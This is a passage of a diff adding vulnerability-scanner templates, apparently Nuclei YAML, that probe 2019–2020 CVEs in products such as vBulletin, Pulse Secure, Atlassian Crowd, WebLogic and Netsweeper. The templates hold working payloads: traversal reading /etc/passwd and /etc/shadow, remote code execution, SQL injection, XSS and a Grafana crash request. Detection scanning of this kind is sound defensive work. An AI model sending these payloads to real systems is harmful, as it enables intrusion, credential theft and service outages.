- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-11248
|
||||
|
||||
info:
|
||||
name: exposed_pprof
|
||||
author: 0xceeb
|
||||
severity: medium
|
||||
|
||||
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
|
||||
# http://mmcloughlin.com/posts/your-pprof-is-showing
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/debug/pprof/"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Types of profiles available:"
|
||||
- "Profile Descriptions"
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2019-11510
|
||||
|
||||
info:
|
||||
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
|
||||
author: organiccrap
|
||||
severity: high
|
||||
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2019-11580
|
||||
|
||||
info:
|
||||
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Atlassian Crowd and Crowd Data Center
|
||||
# had the pdkinstall development plugin incorrectly enabled in release builds.
|
||||
# Attackers who can send unauthenticated or authenticated requests
|
||||
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
|
||||
# to install arbitrary plugins, which permits remote code execution on
|
||||
# systems running a vulnerable version of Crowd or Crowd Data Center.
|
||||
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
|
||||
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
|
||||
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
|
||||
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
|
||||
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
|
||||
# -
|
||||
# References:
|
||||
# > https://github.com/jas502n/CVE-2019-11580
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
|
||||
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "root:*:"
|
||||
- "bin:*:"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 LFIl
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-14322
|
||||
|
||||
info:
|
||||
name: Odoo 12.0 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/web/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/base/static/c:/windows/win.ini"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-14974
|
||||
|
||||
info:
|
||||
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
||||
part: body
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-15043
|
||||
info:
|
||||
author: bing0o
|
||||
name: Grafana unauthenticated API
|
||||
severity: medium
|
||||
requests:
|
||||
- body: >-
|
||||
{"dashboard":
|
||||
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
|
||||
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
|
||||
3600}
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
Host: '{{Hostname}}'
|
||||
User-Agent: Mozilla/5.0
|
||||
matchers:
|
||||
- part: body
|
||||
type: word
|
||||
words:
|
||||
- deleteKey
|
||||
method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/api/snapshots'
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-16759-1
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2019-16759
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
|
||||
|
||||
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
|
||||
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent:1337"
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2019-17382
|
||||
|
||||
info:
|
||||
name: Zabbix Authentication Bypass
|
||||
author: Harsh Bothra
|
||||
severity: Critical
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Dashboard</title>"
|
|
@ -0,0 +1,17 @@
|
|||
id: CVE-2019-18394
|
||||
|
||||
info:
|
||||
name: Openfire Full Read SSRF
|
||||
author: pdteam - nuclei.projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- <h1>Burp Collaborator Server</h1>
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-19368
|
||||
|
||||
info:
|
||||
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "value=''><sVg/OnLoAD=alert`1337`//'>"
|
||||
part: body
|
|
@ -0,0 +1,15 @@
|
|||
id: CVE-2019-19781
|
||||
|
||||
info:
|
||||
name: Citrix ADC Directory Traversal
|
||||
author: organiccrap
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "[global]"
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-19908
|
||||
|
||||
info:
|
||||
name: phpMyChat-Plus XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2019-19985
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
||||
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48698
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- Name
|
||||
- Email
|
||||
- Status
|
||||
- Created On
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Disposition: attachment; filename=all-contacts.csv;"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-2588
|
||||
|
||||
info:
|
||||
name: Oracle Business Intelligence Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
|
||||
- "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2019-2725
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
|
||||
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
|
||||
# Easily exploitable vulnerability allows unauthenticated attacker
|
||||
# with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
# Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
# --
|
||||
# References:
|
||||
# > https://paper.seebug.org/910/
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/_async/AsyncResponseService"
|
||||
- "{{BaseURL}}:7001/_async/AsyncResponseService"
|
||||
body: >-
|
||||
<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
|
||||
xmlns:ads="http://www.w3.org/2005/08/addressing">
|
||||
<soapenv:Header></soapenv:Header>
|
||||
<soapenv:Body></soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "soapenv:Envelope"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "X-Powered-By: Servlet"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-3396
|
||||
info:
|
||||
author: "Harsh Bothra"
|
||||
name: "Atlassian Confluence Path Traversal"
|
||||
severity: High
|
||||
|
||||
# https://github.com/x-f1v3/CVE-2019-3396
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Referer: {{Hostname}}
|
||||
Content-Length: 168
|
||||
Connection: close
|
||||
|
||||
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<param-name>contextConfigLocation</param-name>"
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-3799
|
||||
info:
|
||||
name: Spring-Cloud-Config-Server Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- 'root:[x*]:0:0:'
|
||||
part: body
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-5418
|
||||
|
||||
info:
|
||||
name: File Content Disclosure on Rails
|
||||
author: omarkurt
|
||||
severity: medium
|
||||
# reference: https://github.com/omarkurt/CVE-2019-5418
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Accept: ../../../../../../../../etc/passwd{{
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-6112
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# A Cross-site scripting (XSS) vulnerability
|
||||
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
|
||||
# allows remote attackers to inject arbitrary web script or HTML
|
||||
# via the keyword parameter (aka $search_term or the Search field).
|
||||
# --
|
||||
# References:
|
||||
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
|
||||
- "alert(1337)"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2019-7609
|
||||
|
||||
info:
|
||||
name: Kibana Timelion Arbitrary Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Kibana versions before 5.6.15 and 6.6.1
|
||||
# contain an arbitrary code execution flaw in the Timelion visualizer.
|
||||
# An attacker with access to the Timelion application could send a request
|
||||
# that will attempt to execute javascript code.
|
||||
# This could possibly lead to an attacker executing arbitrary commands
|
||||
# with permissions of the Kibana process on the host system.
|
||||
# --
|
||||
# References:
|
||||
# - https://github.com/mpgn/CVE-2019-7609
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/timelion/run"
|
||||
- "{{BaseURL}}:5601/api/timelion/run"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
|
||||
Content-Type: "application/json; charset=utf-8"
|
||||
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "seriesList"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2019-8449
|
||||
|
||||
info:
|
||||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '{"users":{"users":'
|
||||
part: body
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2019-8451
|
||||
|
||||
info:
|
||||
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
|
||||
author: "TechbrunchFR"
|
||||
severity: medium
|
||||
|
||||
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
|
||||
# security issue reported in August 2019.
|
||||
|
||||
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
|
||||
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
|
||||
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
|
||||
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
|
||||
# network resources.
|
||||
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
# https://twitter.com/benmontour/status/1177250393220239360
|
||||
# https://twitter.com/ojensen5115/status/1176569607357730817
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
|
||||
headers:
|
||||
X-Atlassian-token: no-check
|
||||
matchers:
|
||||
- type: word
|
||||
name: ssrf-response-body
|
||||
words:
|
||||
- '<p>This domain is for use in illustrative examples in documents.'
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-8903
|
||||
|
||||
info:
|
||||
name: Totaljs - Unathenticated Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "apache2.conf"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-8982
|
||||
info:
|
||||
name: Wavemaker Studio 6.6 LFI/SSRF
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2019-9978
|
||||
|
||||
info:
|
||||
name: WordPress social-warfare RFI
|
||||
author: madrobot & dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Reference:- https://github.com/mpgn/CVE-2019-9978
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "Burp Collabolator Server"
|
||||
part: body
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-10199
|
||||
|
||||
info:
|
||||
name: Nexus Repository Manager 3 RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/rest/beta/repositories/go/group'
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "1787569"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-10204
|
||||
|
||||
info:
|
||||
name: Sonatype Nexus Repository RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/extdirect'
|
||||
|
||||
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "1787569"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-1147
|
||||
|
||||
info:
|
||||
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Ref:
|
||||
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
|
||||
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "List does not exist"
|
||||
- "It may have been deleted by another user"
|
||||
part: body
|
||||
condition: and
|
||||
- type: word
|
||||
words:
|
||||
- "Microsoft-IIS"
|
||||
- "X-SharePointHealthScore"
|
||||
- "SharePointError"
|
||||
- "SPRequestGuid"
|
||||
- "MicrosoftSharePointTeamServices"
|
||||
condition: or
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2020-12720
|
||||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 218
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vbulletinrce"
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2020-13167
|
||||
|
||||
info:
|
||||
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# This template exploits a Python code injection in the Netsweeper
|
||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||
# prior, to execute code as the root user.
|
||||
|
||||
# Authentication is bypassed by sending a random whitelisted Referer
|
||||
# header in each request.
|
||||
|
||||
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
||||
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
||||
# been confirmed exploitable.
|
||||
|
||||
# References:
|
||||
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
||||
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
||||
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
||||
- "{{BaseURL}}/webadmin/out"
|
||||
headers:
|
||||
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
|
||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
||||
Connection: "close"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-13379
|
||||
|
||||
info:
|
||||
name: Unauthenticated Grafana DoS
|
||||
author: pxmme1337
|
||||
severity: medium
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48638
|
||||
# WARNING
|
||||
# This vulnerability results in complete crashing of the grafana-server application.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
||||
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
||||
- "{{BaseURL}}/"
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 502
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-17505
|
||||
|
||||
info:
|
||||
name: Artica Web Proxy 4.30 OS Command Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows an authenticated remote attacker
|
||||
# to inject commands via the service-cmds parameter in cyrus.php.
|
||||
# These commands are executed with root
|
||||
# privileges via service_cmds_peform.
|
||||
# -
|
||||
# References:
|
||||
# > https://blog.max0x4141.com/post/artica_proxy/
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
